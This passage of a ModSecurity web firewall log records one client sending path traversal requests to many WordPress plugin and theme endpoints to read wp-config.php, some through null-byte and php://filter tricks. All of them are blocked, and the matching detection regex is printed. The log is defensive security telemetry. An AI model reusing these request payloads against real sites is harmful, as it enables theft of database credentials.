"Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "Y0ZyVeLrJ0tgpRmNRAaIYQAAAM8"] [Wed Oct 12 02:52:53.295725 2022] [:error] [pid 22337:tid 140534467254016] [client 185.189.115.30:50948] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "Y0ZyVaBKlkjFPqrcdjM3-wAAAAc"] [Wed Oct 12 02:52:53.446325 2022] [:error] [pid 22339:tid 140534408505088] [client 185.189.115.30:50950] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "Y0ZyVdmZws0mEkXxGo-VxQAAAI4"] [Wed Oct 12 02:52:53.597974 2022] [:error] [pid 22972:tid 140534580840192] [client 185.189.115.30:50952] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "Y0ZyVeLrJ0tgpRmNRAaIYgAAAMI"] [Wed Oct 12 02:52:53.749244 2022] [:error] [pid 22972:tid 140534366541568] [client 185.189.115.30:50954] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2Fwp-config.php&filename=..%2F..%2Fwp-config.php&contenttype=text%2Fhtml&transient=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "Y0ZyVeLrJ0tgpRmNRAaIYwAAANM"] [Wed Oct 12 02:52:53.944045 2022] [:error] [pid 22972:tid 140534341363456] [client 185.189.115.30:50956] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y0ZyVeLrJ0tgpRmNRAaIZAAAANY"] [Wed Oct 12 02:52:54.095416 2022] [:error] [pid 22972:tid 140534425290496] [client 185.189.115.30:50958] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "Y0ZyVuLrJ0tgpRmNRAaIZQAAAMw"] [Wed Oct 12 02:52:58.339195 2022] [:error] [pid 22972:tid 140534349756160] [client 185.189.115.30:50974] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "Y0ZyWuLrJ0tgpRmNRAaIagAAANU"] [Wed Oct 12 02:52:58.495333 2022] [:error] [pid 22337:tid 140534408505088] [client 185.189.115.30:50976] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/document_manager/views/file_download.php?fname=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/document_manager/views/file_download.php"] [unique_id "Y0ZyWqBKlkjFPqrcdjM3_AAAAA4"] [Wed Oct 12 02:52:58.647670 2022] [:error] [pid 22337:tid 140534458861312] [client 185.189.115.30:50978] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "Y0ZyWqBKlkjFPqrcdjM3_QAAAAg"] [Wed Oct 12 02:52:58.815297 2022] [:error] [pid 22337:tid 140534442075904] [client 185.189.115.30:50980] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "Y0ZyWqBKlkjFPqrcdjM3_gAAAAo"] [Wed Oct 12 02:53:01.492048 2022] [:error] [pid 22338:tid 140534597625600] [client 185.189.115.30:50998] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "Y0ZyXWINFIoIk7hPzpaZgAAAAEA"] [Wed Oct 12 02:53:01.643749 2022] [:error] [pid 22972:tid 140534458861312] [client 185.189.115.30:51000] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dilima/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dilima/pic.php"] [unique_id "Y0ZyXeLrJ0tgpRmNRAaIbQAAAMg"] [Wed Oct 12 02:53:01.794844 2022] [:error] [pid 22339:tid 140534484039424] [client 185.189.115.30:51002] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php?path=..%2F..%2F..%2Fwp-config.php&type=aplication%2Fpdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php"] [unique_id "Y0ZyXdmZws0mEkXxGo-VyAAAAIU"] [Wed Oct 12 02:53:02.989501 2022] [:error] [pid 22972:tid 140534484039424] [client 185.189.115.30:51006] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "Y0ZyXuLrJ0tgpRmNRAaIbgAAAMU"] [Wed Oct 12 02:53:03.141891 2022] [:error] [pid 22972:tid 140534400112384] [client 185.189.115.30:51008] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtheme-unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtheme-unus/css/css.php"] [unique_id "Y0ZyX-LrJ0tgpRmNRAaIbwAAAM8"] [Wed Oct 12 02:53:04.171032 2022] [:error] [pid 22339:tid 140534467254016] [client 185.189.115.30:51014] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "Y0ZyYNmZws0mEkXxGo-VyQAAAIc"] [Wed Oct 12 02:53:04.321908 2022] [:error] [pid 22337:tid 140534341363456] [client 185.189.115.30:51016] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "Y0ZyYKBKlkjFPqrcdjM4AQAAABY"] [Wed Oct 12 02:53:04.472769 2022] [:error] [pid 22337:tid 140534450468608] [client 185.189.115.30:51018] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-uploader/upload.php?destinations=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php%00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-uploader/upload.php"] [unique_id "Y0ZyYKBKlkjFPqrcdjM4AgAAAAk"] [Wed Oct 12 02:53:05.508140 2022] [:error] [pid 22972:tid 140534589232896] [client 185.189.115.30:51022] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "Y0ZyYeLrJ0tgpRmNRAaIcgAAAME"] [Wed Oct 12 02:53:05.664801 2022] [:error] [pid 22339:tid 140534458861312] [client 185.189.115.30:51024] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php%2Fwp-content%2Fplugins%2Fhb-audio-gallery-lite%2Fgallery%2Faudio-download.php%3Ffile_path%3D..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "Y0ZyYdmZws0mEkXxGo-VywAAAIg"] [Wed Oct 12 02:53:05.815706 2022] [:error] [pid 22339:tid 140534450468608] [client 185.189.115.30:51026] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "Y0ZyYdmZws0mEkXxGo-VzAAAAIk"] [Wed Oct 12 02:53:08.784825 2022] [:error] [pid 22972:tid 140534475646720] [client 185.189.115.30:51036] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match 